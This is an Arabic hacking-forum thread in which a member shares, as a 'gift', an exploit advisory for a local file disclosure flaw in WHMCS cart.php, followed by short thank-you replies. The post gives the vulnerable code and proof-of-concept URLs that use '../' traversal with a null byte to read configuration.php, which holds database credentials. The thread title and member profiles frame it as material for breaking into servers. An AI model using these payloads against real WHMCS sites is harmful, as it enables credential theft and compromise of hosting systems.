1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : الهكر الاقرع HR | المشاهدات : 2,059 | الردود : 7
حالة الموضوع:
مغلق
  1. الهكر الاقرع HR Developer

    الأنتساب:
    ‏18 ديسمبر 2012
    المشاركات:
    36
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    نظام التشغيل:
    Linux
    [​IMG]
    السلام عليكم ورحمة الله

    اليوم ثغرة حلوة هدية

    بدون اطالة في الكلام


    رابط الثغرة




    الثغره


    كود PHP:
    # Title      : WHMCompleteSolution (cart.php) Local File Disclosure
    # Author     : Lagripe-Dz
    # Product    : WHMCS ( WHMCompleteSolution )
    # Vendor     : http://whmcs.com/
    # Date       : 10/01/2011
    # Version    : 3.x.x , 4.0.x
    # Tested on  : linux+apache
     
    ================================================================
     
    Vuln filecart.php
    ---------
     
    Vuln code:
    ---------
     
    if ( 
    $a == "add" )
    {
       
    $templatefile "configureproductdomain";
        ....
    etc
    }
     
    if ( 
    $a == "login" )
    {
        
    $templatefile "login";
        ....
    etc
    }
     ...
    outputClientArea$templatefile$nowrapper );
    # outputClientArea function will display
    "./templates/orderforms/cart/{$templatefile}.tpl"
     
     
    Details :
    ---------
     
    if 
    variable "$ahas a true value .. will set "$templatefilevalue by
    default
    but when "$avalue didn't match the defaults values
    you can control "$templatefile" and use it as ( File Disclosure )
     
     
    Proof of Concept :
    ------------------
     
    http://domain.tld/[PATH]/cart.php?a=[wrong_value]&templatefile=[LFD]%00
     
    http://domain.tld/[PATH]/cart.php?a=test&templatefile=../../../configuration.php%00
     
     
    note* : show the page source to see Disclosure file.
     
    Solution :
    ----------
     
    the vendor Notificate
    update to the last version
     
    ================================================================


     
  2. روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    الأنتساب:
    ‏8 نوفمبر 2012
    المشاركات:
    654
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    50
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     
  3. ś‡òÞ Ħąć Developer

    الأنتساب:
    ‏20 مارس 2013
    المشاركات:
    64
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    رد: ثغره من نوع برايفت اسحب روتات

    يعطيك الف عافيه اخوي
     
  4. الحوت الأزرق Developer

    الأنتساب:
    ‏20 نوفمبر 2012
    المشاركات:
    27
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    رد: ثغره من نوع برايفت اسحب روتات

    يعطيك العافيه
     
  5. hacker.cydia Developer

    الأنتساب:
    ‏4 يونيو 2013
    المشاركات:
    19
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الوظيفة:
    pc
    الإقامة:
    Anonymous
    نظام التشغيل:
    Linux
    رد: ثغره من نوع برايفت اسحب روتات

    thnxx .... &:":
     
  6. NETJOURNAL مشرف

    الأنتساب:
    ‏18 مايو 2006
    المشاركات:
    676
    الإعجابات المتلقاة:
    1,544
    نقاط الجائزة:
    215
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:
    etc/shadow/~root
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    PHP
    رد: ثغره من نوع برايفت اسحب روتات

    %:"
     
  7. Mstr Yaser <span style="font-weight: bold; text-shadow: #BBBB موقوف لمخالفة الشروط

    الأنتساب:
    ‏21 نوفمبر 2014
    المشاركات:
    353
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    50
    نظام التشغيل:
    Linux
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    Python
    Facebook:
    YouTube:
    رد: ثغره من نوع برايفت اسحب روتات

    يعطيك الف عافية تسلم ع الطرح ال اكثر من رائع
     
  8. MR.CAPTCHA Expert Developer ExpErt DeveloPer

    الأنتساب:
    ‏30 أغسطس 2014
    المشاركات:
    1,786
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    90
    الوظيفة:
    I.T Student
    الإقامة:
    IRAQ
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    C#
    Facebook:
    YouTube:
    رد: ثغره من نوع برايفت اسحب روتات

    {1!$8}
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة